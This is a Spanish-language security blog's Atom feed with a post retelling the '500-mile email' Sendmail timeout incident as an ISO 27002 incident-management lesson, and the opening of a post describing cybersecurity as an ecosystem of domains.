<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-880510376602933946</id><updated>2025-12-31T21:17:53.416-04:00</updated><category term="Seguridad de Información"/><category term="Vulnerabilidad"/><category term="Novedades"/><category term="Amenazas"/><category term="Ciberdelincuencia"/><category term="Empleo"/><category term="Normas y Politicas"/><category term="Ciberseguridad"/><category term="Ciberterrorismo"/><category term="Herramientas"/><category term="Cibersabotaje"/><category term="Curso Online"/><category term="Hackers"/><category term="Informática Forense"/><category term="Seguridad del producto"/><category term="Vídeo"/><category term="ISO27000"/><category term="Ingeniería Social"/><category term="Recomendaciones"/><category term="Seguridad en Aplicaciones Web"/><category term="Búsqueda de profesionales en TI"/><category term="Cloud Computing"/><category term="Fraude"/><category term="Investigación"/><category term="Kevin Mitnick"/><category term="Phishing"/><category term="Wearables"/><category term="AIsecurity"/><category term="BigData"/><category term="Cheating Stories"/><category term="Criptografría"/><category term="Criptosecuestro"/><category term="DevOps"/><category term="DevSecOps"/><category term="Esteganografía"/><category term="Estegoanálisis"/><category term="Gmail"/><category term="GoogleDocs"/><category term="Identity Manager"/><category term="Jornadas"/><category term="Mapa mental"/><category term="Marcus Hutchins"/><category term="Privacidad"/><category term="Protocolo"/><category term="Realidad aumentada"/><category term="SGSI"/><category term="SQL Injection"/><category term="Suplantación de identidad"/><category term="Tecnologia"/><category term="UCV"/><category term="UTM"/><category term="algoritmos"/><category term="inteligenciaartificial"/><category term="malware"/><category term="ti"/><title type='text'>Seguridad Informática</title><subtitle type='html'>&quot;No hay seguridad en esta tierra, sólo hay oportunidad&quot; Douglas MacArthur</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default?start-index=26&amp;max-results=25&amp;redirect=false'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>101</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-9184862258560120701</id><published>2025-12-22T11:06:00.010-04:00</published><updated>2025-12-22T11:17:01.213-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="ISO27000"/><title type='text'>📧 El correo que no viajaba más de 500 millas</title><content type='html'>&lt;p style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: georgia;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;







&lt;p class=&quot;p1&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-family: georgia;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: georgia;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8BOb5AbtGZtRu1TsreKLO6VPxN8JlOynXNhQVumTq9Fj5SvvqC72TkT9YlWGM-s0M6v_WrCoib-UPK871LyaH5cuRQWsRaUk-J1KOXwOXHIgB-tqJmTW9giWMj_ZM6GAuoTHT4BQnYYcCg2s5GwhWHGeZxyp24D24azKHNwTVR-_LSWnt27f15xwDH5Y/s2218/incidente%20seguridad.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1498&quot; data-original-width=&quot;2218&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8BOb5AbtGZtRu1TsreKLO6VPxN8JlOynXNhQVumTq9Fj5SvvqC72TkT9YlWGM-s0M6v_WrCoib-UPK871LyaH5cuRQWsRaUk-J1KOXwOXHIgB-tqJmTW9giWMj_ZM6GAuoTHT4BQnYYcCg2s5GwhWHGeZxyp24D24azKHNwTVR-_LSWnt27f15xwDH5Y/s16000/incidente%20seguridad.png&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;p1&quot;&gt;&lt;span style=&quot;font-family: georgia;&quot;&gt;&lt;span class=&quot;s1&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/h3&gt;&lt;h1 style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;📧 El correo que no viajaba más de 500 millas&lt;/span&gt;&lt;/b&gt;&lt;/h1&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;p class=&quot;p1&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;Una lección real sobre gestión de incidentes (ISO/IEC 27001 – 27002)&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;Un usuario abrió un ticket diciendo algo aparentemente absurdo:&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;/p&gt;&lt;blockquote&gt;&lt;span style=&quot;color: #0e0e0e; font-style: italic; font-weight: normal;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;No puedo enviar correos electrónicos a más de 500 millas de distancia&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;El administrador de sistemas pensó lo que muchos pensaríamos: &lt;i&gt;“el correo no tiene distancia”&lt;/i&gt;.&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;Sin embargo, el usuario insistió… y tenía razón.&lt;/span&gt;&lt;/p&gt;&lt;/h3&gt;&lt;h2 style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;🔍 El incidente&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;Las pruebas confirmaron el problema:&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;p3&quot;&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;Correos a servidores cercanos: ✅ entregados&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;Correos a servidores lejanos: ❌ fallaban&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;Días antes, el servidor de correo (Sendmail) había sido actualizado.&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;La nueva configuración por defecto redujo el &lt;span class=&quot;s2&quot;&gt;&lt;b&gt;timeout de conexión a 3 milisegundos&lt;/b&gt;&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/h3&gt;&lt;h2 style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;⚡ Cuando la física entra en juego&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;Para establecer una conexión SMTP se requiere un &lt;span class=&quot;s2&quot;&gt;&lt;b&gt;handshake&lt;/b&gt;&lt;/span&gt; (ida y vuelta de la señal).&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;p1&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;La señal en fibra óptica viaja a una velocidad finita (≈ velocidad de la luz).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;En &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;3 ms&lt;/b&gt;&lt;/span&gt;, la señal solo puede recorrer ~900 km ida y vuelta.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot;&gt;Si el servidor destino estaba más lejos, &lt;/span&gt;&lt;b&gt;no alcanzaba a responder antes del timeout&lt;/b&gt;&lt;span class=&quot;s1&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;Resultado: la conexión se cortaba.&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;👉 El servidor de correo estaba limitado por la &lt;span class=&quot;s2&quot;&gt;&lt;b&gt;velocidad de la luz&lt;/b&gt;&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/h3&gt;&lt;h2 style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;🔗 Relación con ISO/IEC 27001 y 27002&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;Este caso es un ejemplo perfecto de &lt;span class=&quot;s2&quot;&gt;&lt;b&gt;gestión de incidentes&lt;/b&gt;&lt;/span&gt;, aunque no haya existido un ciberataque.&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;p1&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;📌 Detección y reporte&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;p class=&quot;p5&quot; style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;ISO 27002 – Control 5.24&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium; font-weight: normal;&quot;&gt;El incidente fue detectado gracias a un &lt;span class=&quot;s2&quot;&gt;reporte de usuario&lt;/span&gt;, una fuente clave que nunca debe subestimarse.&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;p1&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;📌 Evaluación del incidente&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;p class=&quot;p5&quot; style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;ISO 27002 – Control 5.25&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium; font-weight: normal;&quot;&gt;Un evento que parecía trivial afectaba directamente la &lt;span class=&quot;s2&quot;&gt;disponibilidad del servicio de correo&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;p1&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;📌 Análisis y respuesta&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;p class=&quot;p5&quot; style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;ISO 27002 – Control 5.26&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium; font-weight: normal;&quot;&gt;La causa raíz no fue una falla de red ni un ataque, sino un &lt;span class=&quot;s2&quot;&gt;cambio mal controlado en la configuración&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;p1&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;📌 Aprendizaje y mejora&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;p class=&quot;p5&quot; style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;ISO 27002 – Control 5.27&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium; font-weight: normal;&quot;&gt;El verdadero valor del incidente está en lo aprendido:&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;p1&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-weight: normal;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium; font-weight: normal;&quot;&gt;Revisar parámetros críticos tras cambios&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium; font-weight: normal;&quot;&gt;Realizar pruebas post-actualización&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium; font-weight: normal;&quot;&gt;Documentar impactos no evidentes&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/h3&gt;&lt;h2 style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;🎯 Lección clave&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: justify;&quot;&gt;&lt;i style=&quot;color: #0e0e0e; font-weight: normal;&quot;&gt;&lt;blockquote&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;No todos los incidentes de seguridad vienen de ataques.&amp;nbsp;&lt;i&gt;Algunos nacen de una mala configuración… y otros nos recuerdan que incluso la tecnología obedece a las leyes de la física.&lt;/i&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;/i&gt;&lt;/h2&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;p style=&quot;text-align: left;&quot;&gt;

































































&lt;/p&gt;&lt;p class=&quot;p3&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: georgia; font-size: medium;&quot;&gt;La gestión de incidentes no consiste solo en restaurar servicios, sino en &lt;span class=&quot;s2&quot;&gt;&lt;b&gt;entender por qué fallaron y evitar que vuelva a ocurrir&lt;/b&gt;&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/h3&gt;



&lt;p style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;

&lt;p class=&quot;p1&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;

&lt;p style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;

&lt;p class=&quot;p1&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;

&lt;p style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;

&lt;p class=&quot;p1&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;


&lt;p class=&quot;p1&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;


&lt;p class=&quot;p1&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;


&lt;p class=&quot;p1&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;


&lt;p class=&quot;p1&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;s1&quot; style=&quot;font-family: georgia; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;


&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/9184862258560120701/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2025/12/el-correo-que-no-viajaba-mas-de-500.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/9184862258560120701'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/9184862258560120701'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2025/12/el-correo-que-no-viajaba-mas-de-500.html' title='📧 El correo que no viajaba más de 500 millas'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8BOb5AbtGZtRu1TsreKLO6VPxN8JlOynXNhQVumTq9Fj5SvvqC72TkT9YlWGM-s0M6v_WrCoib-UPK871LyaH5cuRQWsRaUk-J1KOXwOXHIgB-tqJmTW9giWMj_ZM6GAuoTHT4BQnYYcCg2s5GwhWHGeZxyp24D24azKHNwTVR-_LSWnt27f15xwDH5Y/s72-c/incidente%20seguridad.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-562471847830866564</id><published>2025-12-18T10:31:00.001-04:00</published><updated>2025-12-18T10:39:29.688-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ciberseguridad"/><title type='text'>🔐 Ciberseguridad: un ecosistema, no una sola herramienta</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCkyTbnu3jHyOIVqNvGCdakeGrflFds_rs-81UrBUq3BrYn2jp46zoZDuSNw_SkdjfwWav1da4lDLqb56roU0lpT3_5VvNDwt3QNeP26G9WvE3R1vn_6wdQMov1E5dzgf_EPxrk4Vbe0CVUzOLWu4i7bYpTNgYo39Oqt6nlN7VXmQwqp-6VlZwTlkU38Y/s1236/Screenshot%202025-12-18%20at%203.28.03%E2%80%AFPM.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1236&quot; data-original-width=&quot;1048&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCkyTbnu3jHyOIVqNvGCdakeGrflFds_rs-81UrBUq3BrYn2jp46zoZDuSNw_SkdjfwWav1da4lDLqb56roU0lpT3_5VvNDwt3QNeP26G9WvE3R1vn_6wdQMov1E5dzgf_EPxrk4Vbe0CVUzOLWu4i7bYpTNgYo39Oqt6nlN7VXmQwqp-6VlZwTlkU38Y/w542-h640/Screenshot%202025-12-18%20at%203.28.03%E2%80%AFPM.png&quot; width=&quot;542&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;







&lt;p class=&quot;p1&quot;&gt;&lt;span class=&quot;s1&quot;&gt;🔐 &lt;/span&gt;&lt;b&gt;Ciberseguridad: un ecosistema, no una sola herramienta&lt;/b&gt;&lt;/p&gt;
&lt;p class=&quot;p3&quot;&gt;Hoy la ciberseguridad dejó de ser únicamente un asunto técnico. Se ha convertido en un &lt;span class=&quot;s2&quot;&gt;&lt;b&gt;pilar estratégico&lt;/b&gt;&lt;/span&gt; que impacta directamente en la &lt;span class=&quot;s2&quot;&gt;&lt;b&gt;continuidad del negocio&lt;/b&gt;&lt;/span&gt;, la &lt;span class=&quot;s2&quot;&gt;&lt;b&gt;reputación&lt;/b&gt;&lt;/span&gt; y la &lt;span class=&quot;s2&quot;&gt;&lt;b&gt;confianza&lt;/b&gt;&lt;/span&gt; de clientes, usuarios y socios.&lt;/p&gt;
&lt;p class=&quot;p3&quot;&gt;Uno de los errores más frecuentes en las organizaciones es creer que la seguridad se resuelve simplemente &lt;span class=&quot;s2&quot;&gt;&lt;b&gt;adquiriendo una herramienta&lt;/b&gt;&lt;/span&gt;.&lt;/p&gt;
&lt;p class=&quot;p3&quot;&gt;La realidad es distinta.&lt;/p&gt;
&lt;p class=&quot;p3&quot;&gt;La ciberseguridad moderna funciona como un &lt;span class=&quot;s2&quot;&gt;&lt;b&gt;ecosistema&lt;/b&gt;&lt;/span&gt;, donde múltiples dominios se integran y se complementan para ofrecer una protección efectiva y sostenible.&lt;/p&gt;
&lt;p class=&quot;p3&quot;&gt;Entre los dominios más relevantes se encuentran:&lt;/p&gt;
&lt;p class=&quot;p4&quot;&gt;&lt;span class=&quot;s3&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot;&gt;☁️ &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Seguridad en la nube&lt;/b&gt;&lt;/span&gt;, para proteger entornos digitales críticos&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot;&gt;💻 &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Seguridad de endpoints&lt;/b&gt;&lt;/span&gt;, que resguarda los dispositivos de los colaboradores&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot;&gt;🌐 &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Seguridad de red&lt;/b&gt;&lt;/span&gt;, para controlar accesos y flujos de tráfico&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot;&gt;🧑‍💼 &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Gestión de identidades (IAM)&lt;/b&gt;&lt;/span&gt;, que define quién accede, a qué y en qué condiciones&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot;&gt;🚨 &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Operaciones de seguridad (SOC)&lt;/b&gt;&lt;/span&gt;, para detectar, analizar y responder a incidentes&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot;&gt;🧩 &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Seguridad de aplicaciones&lt;/b&gt;&lt;/span&gt;, donde se ejecutan los procesos del negocio&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot;&gt;🔐 &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Protección de datos&lt;/b&gt;&lt;/span&gt;, el activo más valioso de la organización&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
&lt;p class=&quot;p1&quot;&gt;📊 &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Gobierno, Riesgo y Cumplimiento (GRC)&lt;/b&gt;&lt;/span&gt;, que alinea la seguridad con la estrategia corporativa&lt;/p&gt;
&lt;/li&gt;&lt;li&gt;
